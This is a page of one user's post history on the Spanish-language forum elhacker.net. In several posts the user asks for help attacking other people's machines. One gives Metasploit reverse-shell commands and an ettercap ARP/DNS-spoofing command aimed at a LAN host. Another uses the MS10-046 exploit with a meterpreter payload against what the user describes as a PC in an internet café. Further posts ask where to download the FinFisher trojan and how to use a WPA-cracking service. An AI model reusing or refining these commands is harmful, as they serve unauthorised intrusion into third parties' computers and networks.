elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Mensajes
Páginas: 1 2 [3] 4
21  Seguridad Informática / Hacking / metaslploit y ettercap - problemas en: 24 Febrero 2013, 16:56 pm
hola,
estoy utilizando backtrack5r3 x64 para tratar de obtener una shell de un equipo (linux-x86) de mi red, creo el exploit y utilizo ettercap para un redireccionamiento a la ip venenosa, pero no funciona, no se que pueda ser, ya modifique el archivo etter.dns, todo parece estar bien, no se que sea. aqui escribo mi codigo:

+++en una consola+++
    msfconsole
    use set payload linux/x86/shell/reverse_tcp
    set srvhost mi-ip-privada
    set srvport 4444
    set uripath /
    set lhost mi-ip-privada
    set lport 23
    exploit
    #el exploit funciona aparentemente

+++en otra consola++++
    ettercap -T -q -P dns_spoof -M arp // // -i wlan0
    #redirecciona correctamente cualquier pagina a mi ip

aparantemente todo deberia funcionar, aunque se que estoy haciendo algo mal, por eso recurro a uds, cualquier aporte ayuda, de antemano muchas gracias.
22  Seguridad Informática / Hacking / metasploit atacando windows7 desde backtrack5r3 en: 28 Noviembre 2012, 03:53 am
hola,
he estado intentando conectarme a un pc con windows7 aprovechndo la vulnerabilidad  MS10-046 con metasploit, pero no me funciona, este el el codigo que utilizo:

msf>    use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
      set payload windows/meterpreter/reverse_tcp
      set srvhost mi-ip
      set lhost mi-ip
      exploit

el problema esta en que no me funciona, intento acceder desde mi casa a una pc de un "cafe internet", no se que estoy haciendo mal, por eso recurro a ustedes.(utilizo backtrack5r3 x64 y la pc windows es windows7 home-premium x64)

de antemano muchas gracias
23  Comunicaciones / Redes / Re: duda sobre wpa.darkircop.org en: 19 Noviembre 2012, 03:37 am
muchas gracias por la respuesta, solo me queda una pregunta, como hago uso de este servicio, ya tengo el handshake, pero, lo subo a la pagina, y luego no se que hacer, se puede descargar un archivo, pero no se que hacer con el.
no se si quizas estoy descargando lo que no es, lo que si se es que estoy haciendo algo mal.

24  Foros Generales / Dudas Generales / proxychain en backtrack5r3 en: 19 Noviembre 2012, 03:28 am
hola,
alguien podria indicarme el procedimiento para instalar una proxychain en backtrack 5r3.

de antemano muchas gracias
25  Foros Generales / Dudas Generales / Re: Alguien sabe donde descargar el f i n f i s h e r? en: 14 Noviembre 2012, 21:48 pm
pero, lei en algun lugar de la deep web que hay muchas filtraciones que permiten a "gente del comun" utilizar este software (no he podido encontrar el citio donde lo lei), es a eso a lo que me refiero
26  Foros Generales / Dudas Generales / Alguien sabe donde descargar el f i n f i s h e r? en: 14 Noviembre 2012, 21:24 pm
hola

alguien sabe donde descargar el troyano f i n f i s h e r? (sin espacios)

de antemano muchas gracias
27  Comunicaciones / Redes / duda sobre wpa.darkircop.org en: 12 Noviembre 2012, 21:51 pm
hola,

alguien sabe como usar el servicio que ofrese esta pagina
http://wpa.darkircop.org/


28  Sistemas Operativos / GNU/Linux / Re: Solicito ayuda : error con el kernel de backtrack 5 r3 en: 12 Noviembre 2012, 21:06 pm
descuida, el problema era el iso, el cd estaba mal grabado, de igual manera muchas gracias por la ayuda :D
29  Sistemas Operativos / GNU/Linux / Re: Solicito ayuda : error con el kernel de backtrack 5 r3 en: 7 Noviembre 2012, 14:18 pm
lo baje de la pagina oficial, descarge un archivo para descargarlo del torrente, ambiente gnome de 64b, mi tarjeta grafica es una AMD Radeon HD 6620g de 512Mb y en cuanto al error no solo me parece en el momento de instalar el driver de mi tarjeta, no puedo instalar nada, esto es lo que aparece:

dpkg: error processing /var/cache/apt/archives/fglrx_2%3a8.723.1-0ubuntu5_amd64.deb (--unpack):
 subprocess new pre-installation script returned error exit status 1
Errors were encountered while processing:
 /var/cache/apt/archives/fglrx_2%3a8.723.1-0ubuntu5_amd64.deb
E: Sub-process /usr/bin/dpkg returned an error code (1)

esto aparece al final de cualquier intento de instalar algo.

lo del kernel no me volvio a aparecer, (porque no recuerdo el comando que utilice) pero era algo asi:

error bad return status for module build on kernel 3.2.6 (x86_64)

30  Sistemas Operativos / GNU/Linux / Solicito ayuda : error con el kernel de backtrack 5 r3 en: 6 Noviembre 2012, 04:27 am
hola,
acabo de instalar backtrack 5r3 en mi pc y cuando quiero instalar los drivers de mi tarjeta gráfica (ati) me sale un error que tiene que ver con un mal funcionamiento del kernel, no se que hacer, ademas tampoco puedo correctamente un idioma por el mimo error,(todo lo hago desde en super usuario root) que debo hacer?

de antemano muchas gracias
Páginas: 1 2 [3] 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines